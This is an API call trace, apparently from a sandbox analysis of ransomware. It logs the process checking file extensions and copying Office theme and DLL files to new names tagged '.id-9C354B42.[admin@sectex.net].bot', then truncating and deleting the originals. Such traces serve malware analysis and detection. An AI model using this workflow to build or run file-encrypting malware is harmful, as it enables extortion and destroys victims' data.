	[0142.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.239] lstrlenW (lpString=".doc") returned 4
	[0142.239] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString=".docx") returned 5
	[0142.239] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.239] lstrlenW (lpString=".pdf") returned 4
	[0142.239] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString=".xls") returned 4
	[0142.239] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString=".xlsx") returned 5
	[0142.239] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.239] lstrlenW (lpString=".ppt") returned 4
	[0142.239] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.239] lstrlenW (lpString=".zip") returned 4
	[0142.239] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString=".rar") returned 4
	[0142.239] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString=".bz2") returned 4
	[0142.239] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString=".7z") returned 3
	[0142.239] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.239] lstrlenW (lpString=".dbf") returned 4
	[0142.239] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.239] lstrlenW (lpString=".1cd") returned 4
	[0142.239] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx") returned 82
	[0142.239] lstrlenW (lpString=".jpg") returned 4
	[0142.239] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.240] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.240] lstrlenW (lpString="Solstice.eftx") returned 13
	[0142.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.241] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=27781) returned 1
	[0142.241] CloseHandle (hObject=0x384) returned 1
	[0142.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx")) returned 0x20
	[0142.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0142.241] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.241] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8
	[0142.242] GetLastError () returned 0x0
	[0142.242] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x6c85, lpOverlapped=0x0) returned 1
	[0142.384] WriteFile (in: hFile=0x3a8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x6c90, lpOverlapped=0x0) returned 1
	[0142.385] ReadFile (in: hFile=0x384, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.385] WriteFile (in: hFile=0x3a8, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xee, lpOverlapped=0x0) returned 1
	[0142.385] SetEndOfFile (hFile=0x3a8) returned 1
	[0142.483] CloseHandle (hObject=0x3a8) returned 1
	[0142.483] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.483] SetEndOfFile (hFile=0x384) returned 1
	[0142.487] CloseHandle (hObject=0x384) returned 1
	[0142.487] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.518] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx")) returned 1
	[0142.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.519] lstrlenW (lpString=".doc") returned 4
	[0142.519] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString=".docx") returned 5
	[0142.519] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.519] lstrlenW (lpString=".pdf") returned 4
	[0142.519] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString=".xls") returned 4
	[0142.519] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString=".xlsx") returned 5
	[0142.519] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.519] lstrlenW (lpString=".ppt") returned 4
	[0142.519] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.519] lstrlenW (lpString=".zip") returned 4
	[0142.519] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString=".rar") returned 4
	[0142.519] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString=".bz2") returned 4
	[0142.519] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString=".7z") returned 3
	[0142.519] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.519] lstrlenW (lpString=".dbf") returned 4
	[0142.519] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.519] lstrlenW (lpString=".1cd") returned 4
	[0142.520] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.520] lstrlenW (lpString=".jpg") returned 4
	[0142.520] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.520] lstrlenW (lpString=".doc") returned 4
	[0142.520] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString=".docx") returned 5
	[0142.520] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.520] lstrlenW (lpString=".pdf") returned 4
	[0142.520] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString=".xls") returned 4
	[0142.520] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString=".xlsx") returned 5
	[0142.520] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.520] lstrlenW (lpString=".ppt") returned 4
	[0142.520] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.520] lstrlenW (lpString=".zip") returned 4
	[0142.520] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString=".rar") returned 4
	[0142.520] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString=".bz2") returned 4
	[0142.520] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString=".7z") returned 3
	[0142.520] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.520] lstrlenW (lpString=".dbf") returned 4
	[0142.520] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.520] lstrlenW (lpString=".1cd") returned 4
	[0142.521] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80
	[0142.521] lstrlenW (lpString=".jpg") returned 4
	[0142.521] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.521] lstrcmpiW (lpString1=".eftx", lpString2=".bot") returned 1
	[0142.521] lstrlenW (lpString="Trek.eftx") returned 9
	[0142.521] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0142.734] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=129924) returned 1
	[0142.734] CloseHandle (hObject=0x3a0) returned 1
	[0142.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx")) returned 0x20
	[0142.750] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0142.750] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.751] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0142.751] GetLastError () returned 0x0
	[0142.751] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x1fb84, lpOverlapped=0x0) returned 1
	[0142.926] WriteFile (in: hFile=0x3c0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x1fb90, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x1fb90, lpOverlapped=0x0) returned 1
	[0142.929] ReadFile (in: hFile=0x37c, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0142.929] WriteFile (in: hFile=0x3c0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0142.929] SetEndOfFile (hFile=0x3c0) returned 1
	[0142.929] CloseHandle (hObject=0x3c0) returned 1
	[0142.930] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0142.930] SetEndOfFile (hFile=0x37c) returned 1
	[0142.937] CloseHandle (hObject=0x37c) returned 1
	[0142.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0142.952] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\trek.eftx")) returned 1
	[0142.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.972] lstrlenW (lpString=".doc") returned 4
	[0142.972] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.972] lstrlenW (lpString=".docx") returned 5
	[0142.972] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.972] lstrlenW (lpString=".pdf") returned 4
	[0142.972] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.972] lstrlenW (lpString=".xls") returned 4
	[0142.972] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.972] lstrlenW (lpString=".xlsx") returned 5
	[0142.972] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.972] lstrlenW (lpString=".ppt") returned 4
	[0142.972] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.973] lstrlenW (lpString=".zip") returned 4
	[0142.973] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString=".rar") returned 4
	[0142.973] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString=".bz2") returned 4
	[0142.973] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString=".7z") returned 3
	[0142.973] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.973] lstrlenW (lpString=".dbf") returned 4
	[0142.973] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.973] lstrlenW (lpString=".1cd") returned 4
	[0142.973] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.973] lstrlenW (lpString=".jpg") returned 4
	[0142.973] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.973] lstrlenW (lpString=".doc") returned 4
	[0142.973] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString=".docx") returned 5
	[0142.973] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1
	[0142.973] lstrlenW (lpString=".pdf") returned 4
	[0142.973] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString=".xls") returned 4
	[0142.973] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1
	[0142.973] lstrlenW (lpString=".xlsx") returned 5
	[0142.973] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1
	[0142.973] lstrlenW (lpString=".ppt") returned 4
	[0142.973] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1
	[0142.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.974] lstrlenW (lpString=".zip") returned 4
	[0142.974] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1
	[0142.974] lstrlenW (lpString=".rar") returned 4
	[0142.974] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1
	[0142.974] lstrlenW (lpString=".bz2") returned 4
	[0142.974] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1
	[0142.974] lstrlenW (lpString=".7z") returned 3
	[0142.974] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1
	[0142.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.974] lstrlenW (lpString=".dbf") returned 4
	[0142.974] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1
	[0142.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.974] lstrlenW (lpString=".1cd") returned 4
	[0142.974] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1
	[0142.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Trek.eftx") returned 76
	[0142.974] lstrlenW (lpString=".jpg") returned 4
	[0142.974] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1
	[0142.974] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0142.974] lstrlenW (lpString="AUTOSHAP.DLL") returned 12
	[0142.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0142.976] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=15776) returned 1
	[0142.977] CloseHandle (hObject=0x3b8) returned 1
	[0142.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll")) returned 0x20
	[0142.977] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0142.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0142.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.977] lstrlenW (lpString=".doc") returned 4
	[0142.977] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.977] lstrlenW (lpString=".docx") returned 5
	[0142.977] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0142.977] lstrlenW (lpString=".pdf") returned 4
	[0142.977] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.977] lstrlenW (lpString=".xls") returned 4
	[0142.977] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.977] lstrlenW (lpString=".xlsx") returned 5
	[0142.977] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0142.977] lstrlenW (lpString=".ppt") returned 4
	[0142.977] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.977] lstrlenW (lpString=".zip") returned 4
	[0142.977] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.977] lstrlenW (lpString=".rar") returned 4
	[0142.977] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.977] lstrlenW (lpString=".bz2") returned 4
	[0142.978] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.978] lstrlenW (lpString=".7z") returned 3
	[0142.978] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.978] lstrlenW (lpString=".dbf") returned 4
	[0142.978] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.978] lstrlenW (lpString=".1cd") returned 4
	[0142.978] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.978] lstrlenW (lpString=".jpg") returned 4
	[0142.978] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.978] lstrlenW (lpString=".doc") returned 4
	[0142.978] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString=".docx") returned 5
	[0142.978] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0142.978] lstrlenW (lpString=".pdf") returned 4
	[0142.978] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString=".xls") returned 4
	[0142.978] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString=".xlsx") returned 5
	[0142.978] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0142.978] lstrlenW (lpString=".ppt") returned 4
	[0142.978] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.978] lstrlenW (lpString=".zip") returned 4
	[0142.978] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString=".rar") returned 4
	[0142.978] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0142.978] lstrlenW (lpString=".bz2") returned 4
	[0142.978] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0142.979] lstrlenW (lpString=".7z") returned 3
	[0142.979] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0142.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.979] lstrlenW (lpString=".dbf") returned 4
	[0142.979] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0142.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.979] lstrlenW (lpString=".1cd") returned 4
	[0142.979] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0142.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70
	[0142.979] lstrlenW (lpString=".jpg") returned 4
	[0142.979] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0142.979] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0142.979] lstrlenW (lpString="BULLETS.DLL") returned 11
	[0142.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BULLETS.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bullets.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
